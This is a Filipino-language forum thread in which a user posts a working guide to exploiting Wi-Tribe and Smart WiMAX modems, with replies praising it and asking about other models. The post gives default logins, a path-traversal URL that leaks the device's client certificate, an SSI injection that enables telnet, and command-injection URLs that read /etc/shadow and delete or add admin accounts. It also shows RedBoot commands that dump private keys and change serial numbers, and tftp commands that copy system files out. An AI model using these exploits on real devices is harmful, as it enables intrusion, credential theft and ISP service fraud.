What's new
Symbianize Forum

Most of our features and services are available only to members, so we encourage you to login or register a new account. Registration is free, fast and simple. You only need to provide a valid email. Being a member you'll gain access to all member forums and features, post a message to ask question or provide answer, and share or find resources related to mobile phones, tablets, computers, game consoles, and multimedia.

All that and more, so what are you waiting for, click the register button and join us now! Ito ang website na ginawa ng pinoy para sa pinoy!

BAGSAKAN 2015 ! - cr4mfs sy

Status
Not open for further replies.

Attachments

  • tamper.png
    tamper.png
    149.2 KB · Views: 195
Last edited:
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Pwede po ba sa smart to sir? i mean sa smart dv? tia sa sagot
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

G3mt3k said:
si alex lang ang master di si cramfs karamihan sa alam ni cramfs ni leech nia lang sa mga tropa nia pati yung pinagmamalaki niang redboot. ang totoo nian bago pa malaman ni cramfs yung pem key dump sa tribu alam na ni natalia matagal na. in short niligawan ni cramfs ang command pero mautak si alex aka natalia gazanova kaya ang binigay eh dump na minsan sablay na agad namang pinagmalaki ni scammer king at pinagkaperahan. malalalim ang kwento kung bakit badtrip sa kanya si alex. kaya para sakin leecher din yang si cramfs..wag mo lokohin sarili mo cramfs alam mong totoo sinasabi ko hahahahaha:lol::rofl::lol: baka sabihin mo na naman ingit kami sayo??? wala ako dapat kaigitan sayo
Click to expand...

ka-team mediatek nya rin ba yung sinasabi mong alex tol ? ? ?
o magkakatropa sila nagkaroon lang ng alitan ? ? ?
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

bm salamat :D
 
Updated na po !!

Lahat na po anjan na
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

well darating din ang time na....." ALL PORTS WILL BE CLOSED ". ung lamang me alam sa architecture at software ng embedded device

ang makapagsasabing " OPEN SESAME " ang maaring makapag-access nito. ang sinumang makakagawa nito ay masasabi nating tunay

na MASTER ng symbianize.

mga tol baka pwede ceasefire muna tayo ha !:pray walang personalan.....trabaho lang.:salute: tantanan na muna ninyo si cramfs.:salute:
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

malabo na isasara ang mga ports. dahil mwawalan ng access ang telecoms sa mga broadband. changing ports and other securities possible pa yan
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

sana may witribe din ako.. :lol:
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

LIBERTY WIXB-175x204 paano reconnect open na po yung telnet,,,pahingi naman ng tut sir,,,salamat dito sa thread niyo po....
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Mahusay !! The best Thread ever !!
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Boss Meron Kabang pang OX230 Back Door Thanks in advance sa share :salute:
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Ayos may BAGSAKAN din pala dito. hehehe.... Este pasabog pala nice 1 cramfs. :thumbsup: :salute:
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

pwede din po ba enable yung telnet ng smart na v7?
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

ayos galing mo ts :salute::salute::salute::salute::salute: maraming salamat
 
cr4mfs sy said:
LIBERTY WIXB-175x204 PEMKEY GRABBING​

STEP # 1

On Mozilla Browser Oepn Victims IP. LOGIN using this possible credentials

witribe
witribe123
witribe12345

STEP # 2

Press CTRL + SHIFT key. Click Debugger Tab. At the left side makikita mo ang sysconf.cgi. Itapat mo ang CURSOR mo sa sysconf.cgi upang makita mo ang URL
at Lumabas ang SID. Pagdating sa timestamp kahit default timestamp lang na lalabas sa Address bar mo.

View attachment 1040555

STEP # 3

Open NEW TAB > Copy and Paste this Exploit. ilagay ang nararapat na ip address at SID at TIMESTAMP.
then press ENTER lalabas na ang mahiwagang PEMKEY.

SAMPLE EXPLOIT:


EXPLOIT:
https://ip address:8080/cgi-bin/sysconf.cgi?page=../../tmp/var/client.pem&action=request&sid=ilagay dito ang sid×tamp=ilagay dito ang timestamp

View attachment 1040557


OPTIONAL:
SA MGA MARUNONG GUMAMIT NG TAMPER DATA MAS MADALI DITO.

1. LOGIN TO VICTIMS GUI.

2. Go to Personalize Tab > Device Name .. ilagay sa New Device Name FOO. Huwag muna iclick ang APPLY.

3. Open Tamper Data then Click START then Click mo na ang APPLY.

4. Uncheck mo yung Continioue Tampering. Then Click Tamper.

5. Then Click OK

View attachment 1040562


6. hanapin mo ang GET right Click mo yun Choose Replay Browser

View attachment 1040560

7. Dapat ganito lalabas after mo piliin ang Replay Browser. may makikita ka doon na Personalize_password. Papalitan mo yun ng ../../tmp/var/client.pem Then Click Okay. then magoopen syang ng New Tab at lalabs doon ang Pemkey.

View attachment 1040565


=======================================================================
BACKDOOR COMMANDS
=======================================================================​

Tamper Data Method:

1. Gayahin lang ang Method ng Tamper Data via Device Name.

2. Change name to FOO

3. Start Tamper Data. Change FOO to <!--#exec cmd="cmscfg -s -n sys_telnetd -v enable"-->

4. Click OK.

5. Again hanapin ang GET > right Click Then Choose Replay Browser.lalabas doon ay Personalize_password palitan mo ng ../../etc/hosts Then click OK

6 .TELNET IS NOW ENABLE




====================================================
COMPLETE REDBOOT COMMAND
====================================================​

BEFORE ANYTHING ELSE, GUSTO KO SABIHIN NA HINDI KO ITO NA LEECH KANINUMAN. IPAPAKITA KO DITO ANG PROCESS KUNG PAANO KO NAKUHA ANG COMMAND NG REDBOOT. HERE'S THE PROOF.

1. GAMITIN MO ANG TOOL NG CERT-WRITER.EXE AT SNWRITER.EXE GALING SA BM622M .

2. DOWNLOAD WIRESHARK

3. NGAYON CLOSE ALL BROWSERS AT RUNNING APPLICATION PARA DI ITO MADETECT NG WIRESHARK.

4. OPEN CERT-WRITER.EXE OR SNWRITER.EXE. THEN OPEN WIRESHARK.

5. CHOOSE INTERFACE SA WIRESHARK PILIIN ANG LAN INTERFACE THEN CLICK START. OPEN CERT-WRITER.EXE THEN CLICK CONNECT
THEN MAG UPLOAD KA NG CERTIFICATE AT PRIVATE KEY. ITO AY PARA MAKITA SA WIRESHARK KUNG PAANO MAG WRITE NG PEMKEY.

6. AFTER MAIUPLOAD ANG PEM AT KEY CLICK VERIFY PARA MA DUMP MO NAMAN ANG PEM AT KEY AT MAKITA SA WIRESHARK.

7. PUNTA KA SA WIRESHARK HANAPIN MO DOON YUNG 192.168.15.1
IMAGE:
View attachment 1040791

8. RIGHT CLICK MO ANG 192.168.15.1 THEN CHOOSE "FOLLOW TCP STREAM" MAKIKITA MO NA NAIRECORD NYA ANG MGA COMMAND AT OUTPUT NG REDBOOT.PWEDE MO RIN SYA ISAVE.

IMAGE:
View attachment 1040794


"PARA PO SA KAALAMAN NG NAKARARAMI MAGKAIBA PO ANG FORMAT NG PAGHUGOT NG PEM AT KEY NG WI-TRIBE AT SMART."

SMART DUMP PEM AT KEY

OPEN CMD
TYPE 192.168.15.1
LOGIN: mt7109
password: wimax

Code: 
#nc 169.254.71.8 9000
<PRESS ENTER>
RedBoot>rfcal -act 48 -arg1 0 -arg2 4096
RedBoot>rfcal -act 49 -arg1 0
4084 
RedBoot>read cert_file 4084 0
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
RedBoot>rfcal -act 48 -arg1 1 -arg2 1712
RedBoot>rfcal -act 49 -arg1 1 
1712 
RedBoot>read cert_file 1712 0
-----BEGIN RSA PRIVATE----- 
-----END RSA PRIVATE KEY-----


WI-TRIBE DUMP PEM AT KEY

OPEN CMD
TYPE 192.168.15.1
LOGIN: mt7109
password: wimax

Code: 
#nc 169.254.71.8 9000
<PRESS ENTER>
RedBoot> 
rfcal -act 48 -arg1 0 -arg2 1184
RedBoot> 
rfcal -act 49 -arg1 0 
1183 
RedBoot> 
read cert_file 1183 0
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
RedBoot> 
rfcal -act 48 -arg1 1 -arg2 896

RedBoot> 
rfcal -act 49 -arg1 1 
896 
RedBoot> 
read cert_file 896 0
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----

CHANGE SERIAL NUMBER

Code: 
RedBoot> rfcal -act 25
RedBoot> read serialno 128 0
DVTKC133200799
RedBoot>write serialno 128 0
g 1212211123456gtk


ANG LAHAT NG ITO AY MAY BASEHAN, NORMALLY MAKAKAPAG REDBOOT KA SA PORT 9000 LANG. ITO AY MAGAGAWA LAMANG SA LAN CONNECTION. WELL KNOWN NA SA ATIN YAN MATAGAL NA.

Code: 
EXAMPLE: 
telnet 192.168.15.1 9000

redboot>


ANG PAG REDBOOT NAMAN SA LOOB NG TELNET NA NAGAGAWA SA WAN AT LAN AY MAY BASEHAN AKO KUNG PAANO KO NAKUHA AT DI KO ITO NA LEECH KANINUMAN.

ANG LOGIC AY MATATAGPUAN SA LOOB NG /init.d/boot_update File Directory.

View attachment 1040797


================================================
OD235 / OD35 BACK DOOR COMMAND AND TRICK
================================================​

Code: 
[COLOR="#0000FF"]BROWSER BACK DOOR OD235
OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAYS SUCCESFULLY[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+[COLOR="#008000"]cat+/etc/shadow[/COLOR]

[COLOR="#0000FF"]OPEN NEW TAB
PASTE THIS COMMAND LINK.DOON LALABAS ANG RESULT[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1
PAPALITAN MO ANG /etc/shadow depende sa nais mo makita.

CHANGE ADMIN LOGIN SA OD235 ONLY !! USER LOGIN ONLY / BLANK PASSWORD

Code: 
[COLOR="#0000FF"]OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAYS SUCCESFULLY[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+deluser Superuser 

[COLOR="#0000FF"]OPEN NEW TAB
PASTE THIS COMMAND LINK.DOON LALABAS ANG RESULT[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1

[COLOR="#0000FF"]CHANGE ADMIN LOGIN SA OD235 ONLY !![/COLOR]
OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAYS SUCCESFULLY
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+adduser CRAMFS

[COLOR="#0000FF"]OPEN NEW TAB
PASTE THIS COMMAND LINK.DOON LALABAS ANG RESULT[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1

DIRECTORY LIST

/etc/passwd
/etc/shadow
/mnt/jffs2/conf/user/supplicant.conf
/mnt/jffs2/conf/user/ltesetting.conf
/mnt/jffs2/conf/user/ui.conf
/mnt/jffs2/conf/iser/wmxsetting.conf
/mnt/jffs2/conf/user/sysini.conf

HIDDEN COMMANDS

cmscfg --help
-s SET
-g GET
-r REPLACE
-v VALUE
-n PARAM

SAMPLE COMMAND:

telnetd enable

cmscfg -s -n sys_telnetd -v enable

ftpd enable

cmscfg -s -n sys_ftpd -v enable

TFTP COMMAND

must have tftpd32.exe, set-up your ip to 192.168.15.2 and tftpboot directory

~#cd /mnt/jffs2/conf/user/
~#tftp -g -r /mnt/jffs2/conf/user/sysini.conf 192.168.15.2 sysini.conf---> get file

~#cd /mnt/jffs2/etc/
~#tftp -p -r shadow 192.168.15.2 shadow ---> put file

OPEN TELNET FOR BOTH WITRIBE LIBERTY AND OD235 or OD350

the command is;
Code: 
fw_setenv factory 1   ----> to enable telnet , but disabled http

fw_setenv factory 0   -----> to enable http , but disabled telnet

DISCLAIMER:
WALA AKONG PANANAGUTAN KUNG ANO MAN ANG MANGYARI SA INYONG DEVICE. STRICTLY FOR EDUCATIONAL PURPOSES ONLY.
WALA NA PO AKONG PANANAGUTAN KUNG ITO PO AY GAMITIN SA ILLEGAL . USE IT AT YOUR OWN RISK



ENJOY :)

CR4MFS SY
Click to expand...

Salamat master ikalat ko ito sa world wide web heheehe :)
 
panu kung dv-235t ang gamit?,,,gagana po ba ito?..salamat
 
Bagsakan talaga ang name ng thread :lol:

Paano magpa-reconnect ng liberty?
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

boom lupit :)
 
Status
Not open for further replies.

Similar threads

jalexzia
Cert And Key Grabbing HOT HOT HOT....
2 3 4
Replies
71
Views
11K
kerygmaa
K
logie0726
OD235 Change Admin, SMART SIM, PEM/KEY, APN, FREQ, SMS, POE and More...
25 26 27 28 29
Replies
577
Views
79K
Antotitot
A
muhua00
OD-235 using WireShark
Replies
2
Views
938
demonic666
demonic666
B
Sa mga ka tribo jan. Dagdagan natin info para mactv8 na witribe
Replies
18
Views
2K
getbounce
getbounce
Back
Top Bottom